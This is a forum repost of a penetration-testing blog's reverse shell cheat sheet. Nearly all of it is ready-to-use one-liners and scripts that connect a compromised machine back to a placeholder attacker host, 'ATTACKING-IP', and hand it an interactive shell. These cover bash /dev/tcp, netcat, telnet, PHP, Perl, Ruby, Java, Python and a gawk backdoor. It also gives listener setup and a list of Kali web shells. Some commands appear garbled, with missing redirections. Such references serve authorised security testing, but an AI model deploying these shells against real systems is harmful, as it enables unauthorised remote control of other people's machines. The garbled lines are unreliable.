Reverse Shell Cheat Sheet
Page 1 of 1
Reverse Shell Cheat Sheet
Reverse Shell Cheat Sheet
cheat-sheet29 Mar 2015 Arr0way
- Setup Listening Netcat
- Bash Reverse Shells
- PHP Reverse Shell
- Netcat Reverse Shell
- Telnet Reverse Shell
- Perl Reverse Shell
- Perl Windows Reverse Shell
https://highon.coffee/blog/reverse-shell-cheat-sheet/
During penetration testing if you’re lucky enough to find a remote command execution vulnerability, you’ll more often than not want to connect back to your attacking machine to leverage an interactive shell.
Below are a collection of reverse shells that use commonly installed programming languages, or commonly installed binaries (nc, telnet, bash, etc). At the bottom of the post are a collection of uploadable reverse shells, present in Kali Linux.
Setup Listening Netcat
Your remote shell will need a listening netcat instance in order to connect back.Set your Netcat listening shell on an allowed port
Use a port that is likely allowed via outbound firewall rules on the target network, e.g. 80 / 443
To setup a listening netcat instance, enter the following:
- Code:
root@kali:~# nc -nvlp 80
nc: listening on :: 80 ...
nc: listening on 0.0.0.0 80 ...
NAT requires a port forward
If you're attacking machine is behing a NAT router, you'll need to setup a port forward to the attacking machines IP / Port.
ATTACKING-IP is the machine running your listening netcat session, port 80 is used in all examples below (for reasons mentioned above).
Bash Reverse Shells
- Code:
exec /bin/bash 0&0 2>&0
- Code:
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
- Code:
exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done
# or:
while read line 0<&5; do $line 2>&5 >&5; done
- Code:
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1
PHP Reverse Shell
- Code:
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
(Assumes TCP uses file descriptor 3. If it doesn't work, try 4,5, or 6)
Netcat Reverse Shell
- Code:
nc -e /bin/sh ATTACKING-IP 80
- Code:
/bin/sh | nc ATTACKING-IP 80
- Code:
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p
Telnet Reverse Shell
- Code:
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
- Code:
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
Remember to listen on 443 on the attacking machine also.
Perl Reverse Shell
- Code:
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Perl Windows Reverse Shell
- Code:
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
- Code:
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby Reverse Shell
- Code:
ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Java Reverse Shell
- Code:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Python Reverse Shell
- Code:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Gawk Reverse Shell
- Code:
#!/usr/bin/gawk -f
BEGIN {
Port = 8080
Prompt = "bkd> "
Service = "/inet/tcp/" Port "/0/0"
while (1) {
do {
printf Prompt |& Service
Service |& getline cmd
if (cmd) {
while ((cmd |& getline) > 0)
print $0 |& Service
close(cmd)
}
} while (cmd != "exit")
close(Service)
}
}
Kali Web Shells
The following shells exist within Kali Linux, under- Code:
/usr/share/webshells/
Kali PHP Web Shells
| Pen Test Monkey - PHP Reverse Shell |
| Pen Test Monkey, Findsock Shell. Build
|
| PHP backdoor, usefull for CMD execution if upload / code injection is possible, usage:
|
| Larger PHP shell, with a text input box for command execution. |
The last two shells above are not reverse shells, however they can be useful for executing a reverse shell.
Kali Perl Reverse Shell
| Pen Test Monkey - Perl Reverse Shell |
| Pen Test Monkey, Perl Shell. Usage:
|
Kali Cold Fusion Shell
| Cold Fusion Shell - aka CFM Shell |
Kali ASP Shell
| Kali ASP Shells |
Kali ASPX Shells
| Kali ASPX Shells |
Kali JSP Reverse Shell
| Kali JSP Reverse Shell |
Share this on...
[url=https://twitter.com/intent/tweet?text=Reverse Shell Cheat sheet&url=https://highon.coffee/blog/reverse-shell-cheat-sheet/&via=Arr0way&related=Arr0way]Twitter[/url] Facebook Google+ [url=https://www.reddit.com/submit?url=https://highon.coffee/blog/reverse-shell-cheat-sheet/&title=Reverse Shell Cheat Sheet] Reddit[/url]
Follow Arr0way
Twitter GitHub
Also...
You might want to read these
| Penetration Testing Tools Cheat Sheet |
| LFI Cheat Sheet |
| HowTo: Kali Linux Chromium Install for Web App Pen Testing |
| InsomniHack CTF Teaser - Smartcat2 Writeup |
| InsomniHack CTF Teaser - Smartcat1 Writeup |
| FristiLeaks 1.3 Walkthrough |
| SickOS 1.1 - Walkthrough |
| The Wall Boot2Root Walkthrough |
| /dev/random: Sleepy Walkthrough CTF |
| /dev/random Pipe walkthrough |
Cheat Sheets
- Penetration Testing Tools Cheat Sheet
- LFI Cheat Sheet
- Vi Cheat Sheet
- Systemd Cheat Sheet
- Reverse Shell Cheat Sheet
- nbtscan Cheat Sheet
- Nmap Cheat Sheet
- Linux Commands Cheat Sheet
- More »
WalkThroughs
- InsomniHack CTF Teaser - Smartcat2 Writeup
- InsomniHack CTF Teaser - Smartcat1 Writeup
- FristiLeaks 1.3 Walkthrough
- SickOS 1.1 - Walkthrough
- The Wall Boot2Root Walkthrough
- More »
Techniques
Security Hardening
/dev/urandom
Other Blog
- HowTo: Kali Linux Chromium Install for Web App Pen Testing
- Jenkins RCE via Unauthenticated API
- MacBook - Post Install Config + Apps
- enum4linux Cheat Sheet
- Linux Local Enumeration Script
- HowTo Install Quassel on Ubuntu
- HowTo Install KeepNote on OSX Mavericks
The contents of this website are © 2017 HighOn.Coffee
Proudly hosted by
Similar topics
» How to Get a Reverse Shell in 3 Seconds with the USB Rubber Ducky
» PHP Cheat Sheet
» BASh Cheat Sheet App
» MSF Reverse TCP Kali 2 Example
» Python Reverse Speech
» PHP Cheat Sheet
» BASh Cheat Sheet App
» MSF Reverse TCP Kali 2 Example
» Python Reverse Speech
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
|
|